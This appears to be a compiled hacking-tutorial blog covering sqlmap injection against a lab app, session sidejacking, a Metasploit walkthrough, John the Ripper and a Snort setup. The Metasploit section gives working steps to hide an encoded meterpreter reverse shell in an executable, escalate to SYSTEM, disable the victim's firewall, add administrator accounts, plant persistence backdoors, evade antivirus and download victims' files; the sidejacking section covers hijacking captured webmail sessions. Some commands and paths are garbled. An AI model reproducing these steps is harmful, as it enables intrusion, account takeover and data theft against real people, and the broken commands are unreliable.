Blind SQL Injection for Forms fields using SqlMap

SQLMAP

Sqlmap is an automatic SQL injection tool entirely developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more

Blind SQL Injection for Forms 

Here we vulnerable application Mutillidae that is vulnerable to sql injection. And the attacker system is Kali Linux. As sqlmap already installed in the operation system. To check all the options available in sqlmap you can use command

sqlmap -h

if there is login page that contain a form that have two parameters user-name and password.

Then command for sql map will be  

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms --dbs

Here  172.16.221.129 is my virtual box ip where mutillidae is hosted.

Here --form option is used for form based authentication it will automatically identify how many parameter are there and try to exploit them.

--dbs is used for databases.

After hitting the enter it will automatically identify parameters and ask attacker what type of attack he want to perform.

Enter y here to continue the sql injection.

After hitting enter sqlmap will ask to continue.

Hit enter

again sqlmap will ask what type of data you want to set as payload. By default it will set random values (payload for sql injection). Hit y and enter.

After sending requests using payloads to find sql injection. If its vulnerable sqlmap ask do you want to exploit. Hit y and hit Enter.

If sqlmap prompt user for input like if there is any other type of response from server like 302, then sqlmap ask user do you want to follow that stream. Then hit n and enter

After finish the scanning sqlmap will show the list of databases.

As we can see there is a database name Mutillidae. Now we have to fatch all the data from this database. By using the option -D databasename and --tables we can fatch the tables names in mutillidae database. Now the sqlmap command will be like.

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms -D mutillidae --tables

and follow the same process as of now. The result will be all the tables in database  mutillidae

Now we got all the tables in database mutillidae.  Now we have to fetch all the values inside table accounts. To fetch all the detail the query will be.

sqlmap -u https://172.16.221.129/mutillidae/index.php?page=login.php --forms -D mutillidae -T accounts --dump

-T options is to set table as table name is accounts here and --dump will get all the data inside the table accounts.

The result will be

Now try to login with user-name and password. Like I am trying username – patches and password  tortoise.

Login is successfully done.

Use can also set threads and risk and level by default value for these parameters is 1.  But if we set values more than 1 then sqlmap create complex query to exploit sql injection vulnerability. It will increase the chances to find vulnerabilities and exploit that vulnerability.

Hacking into Users account by Side Jacking

Sidejacking is the process of stealing someone's access to a website, typically done on wireless public networks. To perform sidejacking attack, the application that victim is using must be in http traffic. In order to sidejack access to a website, the bad actor uses a packet sniffer to obtain an unencrypted cookie that will grant access to a specific application. This will allow attacker  to impersonate the user as the session cookie is already providing access to the web application's content.

1) Installing Ferret and Hamster in Ubuntu linux

sudo su

apt-get install libpcap-dev

create a folder with name sidejack in root directory

mkdir sidejack

cd  sidejack

wget http://www.erratasec.com/erratasec.zip

unzip erratasec.zip

mv hamster hamster2

cd hamster2/build/gcc4

make

cd /sidejack /ferret/build/gcc4

make

cd /sidejack

mkdir hamster

cp /sidejack /ferret/bin/ferret /sidejack /hamster

cp /sidejack /hamster2/bin/favicon.ico /sidejack /hamster

cp /sidejack /hamster2/bin/hamster /sidejack /hamster

cp /sidejack /hamster2/bin/hamster.css /sidejack /hamster

cp /pentest/hamster2/bin/hamster.js /sidejack /hamster

2) Capture login credentials packets of any web login(gmail, hotmail etc) through wireshark(run wireshark in promiscuous mode) and save the file as test.pcap under directory /sidejack /hamster2/bin/

3) cd /sidejack /hamster2/bin/

4) ./ferret -r test.pcap (Reads the mail id and necessary login credentials)

5) ./hamster (Starts hamster proxy server on http://127.0.0.1:1234

6) Configure your browser with proxy server as 127.0.0.1 and port as 1234

7) Type http://hamster in your browser.

8) Click on your IP at the bottom of the page that contains email id or any login name with which you logged into previous page while capturing packet earlier.

9) At the right pane, you can see several cookies, click one of them to receive the logged in session of your earlier page. Now your session is hijacked and you can change anything inside the session.

Hack Window 7 x64 window XP x64 using metasploit

Firstly i am telling you don't do this for illegal work  this tutorial is only for knowledge enhancement. or do it on your own risk don't blame me for anything.

Tool require is metasploit.

# Here are some examples on [] from the guide beneath:
# set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []

-------------------------------------

cd /pentest/exploits/framework3/
svn up
# To update framework3
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# If you get encoder error find another EXE or try to encode it less time
# Copy payload to target

-------------------------------------

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT] (if used in msfpayload in Shell 1)
show options
exploit


----------
# Now we wait for connection, so start the payload on victim computer
----------

use priv
ps
# Look for PID on explorer.exe
migrate [PID on explorer]
getsystem
sysinfo
# If "Arch = x64" = NO HASHDUMP it won't work
# Now we are in the system
-------------------------------------

shell
# Connect to CMD
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections
Netsh firewall set opmode enable
# Enable Firewall on Victim
Netsh firewall set opmode disable
# Disable Firewall on Victim
net user [USERNAME] [PASSWORD]
# Change password for the user
# Or create you own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
net accounts /maxpwage:[days] | unlimited
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited

# CTRL + Z then Y to exit shell without it freezing the system

-------------------------------------

{Shell 3} (RDP to compromised system)

# No need for ":" and [PORT] if local
# Remember to be in "root@bt:~#"
rdesktop [IP]:[port] -u "[USERNAME]"
run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
**UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!
PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit

----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------

getuid
# If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":
ps
# Find PID on explorer.exe
steal_token [NUMBER - PID on explorer]
# From what i know it grants you the same rights as the user running that process
use priv
get system
------------------------------------

{Search} (in meterpreter console)

search -f *.jpg
# Finding all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Finding all JPG filen i a specific folder
searct -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (How I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:

{Upload}
upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"
# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

{Download}
Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt
# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"
# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

John the Ripper, Password Cracker tool

John the Ripper is free and Open Source software,its the most famous and one of the best password cracker in the real time world.
its most widely used tool to crack the passwords in the unix  environment.Its distributed primarily in source code form.

If you would rather use a commercial product tailored for your specific operating systemJohn the Ripper is a program that decyrpts Unix passwords using DES (Data Encryption Standard). 

Step 1: Download JTR.

Step 2: Extract JTR. using the command

##--tar -xzf john-1.6.tar.gz

The filename must include the .txt extension. This is the regular crack that file with .txt extension will be used as a dictionary 

user name to use the john the ripper

##--User:gyuJo098KkLy9

Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt'if you know the streanth of the password  the you can use Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist

##--john -single crackme.txt

Wordfile: Uses a wordlist (basically a dictionary attack). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default (bruteforce) attack, but I don't recommend this because it doesn't always find a match. More notes on wordlists below.

##--john -wordfile:password.lst crackme.txt

Restore: Ok, let's say that you need to stop the crack in the middle. Press crtl+break.A file will be created in the JTR directory named 'restore' (no quotes doofus, and yes, no file extention). You can start the crack back up from that restore point

##--john -restore:restore

Session: Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.

##--john -session:[save to filename] crackme.txt

Shows how fast JTR will work on your computer

##- john -test

hacking with Snort IDS/IPS

Snort
Snort is a free lightweight network intrusion detection system for both UNIX and Windows.
Snort Combining the benefits of signature, protocol, and anomaly-based inspection, Snort is the most widely deployed IDS/IPS technology worldwide
in the blog i am gonna show you how to install snort from source, write rules, and perform basic testing.

Download and Extract Snort

# cd /usr/src
# wget -O snort-2.8.6.1.tar.gz http://www.snort.org/downloads/116
# tar xvzf snort-2.8.6.1.tar.gz

Install Snort

Before installing snort, make sure you have dev packages of libpcap and libpcre.
these are the essential to build a good ids

#apt-get install snort-mysql
#apt-get install libpcap0.8-dev
#apt-get install libnet1-dev
#apt-get install build-essential
#apt-get install checkinstall
#apt-get install libpcre3-dev
#apt-get install libmysqlclient12-dev


# cd snort-2.8.6.1
# ./configure
# make
# make install

Create the required files and directory
# mkdir /etc/snort
# mkdir /etc/snort/rules
# mkdir /var/log/snort

Copy two files inside our new /etc/snort/rules directory:
- classification.config: defines URLs for the references found in the rules.
- reference.config: includes information for prioritizing rules.


#cp snort-2.6.1.3/etc/classification.config /etc/snort_inline/rules/
#cp snort-2.6.1.3/etc/reference.config /etc/snort_inline/rules/


Create a user called snort to launch Snort:
#useradd snort -d /var/log/snort -s /bin/false -c SNORT_IDS

Create a log directory owned by the snort user:

You need first to use the "configure" command to check the dependancies and prepare Snort to be compiled for MySQL.
#cd snort_inline-2.6.1.3
#./configure --with-mysq

Create the following snort.conf and icmp.rules files:

# cat /etc/snort/snort.conf
include /etc/snort/rules/icmp.rules
# cat /etc/snort/rules/icmp.rules
alert icmp any any -> any any (msg:"ICMP Packet"; sid:477; rev:3;)

Execute snort

Execute snort from command line, as mentioned below.
# snort -c /etc/snort/snort.conf -l /var/log/snort/
Try pinging some IP from your machine, to check our ping rule
# head /var/log/snort/alert
[**] [1:477:3] ICMP Packet [**]
[Priority: 0]
07/27-20:41:57.230345 > l/l len: 0 l/l type: 0x200 0:0:0:0:0:0
pkt type:0x4 proto: 0x800 len:0x64
209.85.231.102 -> 209.85.231.104 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:84 DF
Type:8  Code:0  ID:24905   Seq:1  ECHO


Alert Explanation
# snort -dev -i ppp0 -c /etc/snort/snort.conf -l /var/log/snort/

configure database

Add a password for the MySQL root user:
#mysqladmin -u root password new_root_password
Create the MySQL database and tables Create the MySQL database
#mysql -u root -p
>create database snort;


 Packaged installation
Find the tables: dpkg -L snort-mysql
We are looking for the create_mysql.gz file, it is normally located in the /usr/share/doc/snort-mysql folder.

#gzip –d /usr/share/doc/snort-mysql/create_mysql.gz
Import the MySql tables:

#mysql -u root -p snort < /usr/share/doc/snort-mysql/create_mysql

 CONFIGURE SNORT FOR SQL

We now have to forward the logs into the MySql database:
This is already done by installing the snort-mysql package, we just need only to configure the username and password to access the snort database.
In the /etc/snort/snort.conf file, we have to change the line between (#DBSTART#) and (#DBEND#):

output database: log, mysql, user=snortuser password=snortpassword dbname=snort host=localhost

 uncomment the following lines:

ruletype redalert
{
type alert
output alert_syslog: LOG_AUTH LOG ALERT
output database: log, mysql, user=snortuser password=snortpassword dbname=snort host=localhost
}
Start Snort !!

snort –u snort –c /etc/snort/snort.conf

Snort is started under the snort user and will load the config stored in the /etc/snort/snort.conf file


We have to add a line inside the /etc/crontab file to start Snort automatically after a reboot:

@reboot root snort -u snort -c /etc/snort/snort.conf >> /dev/null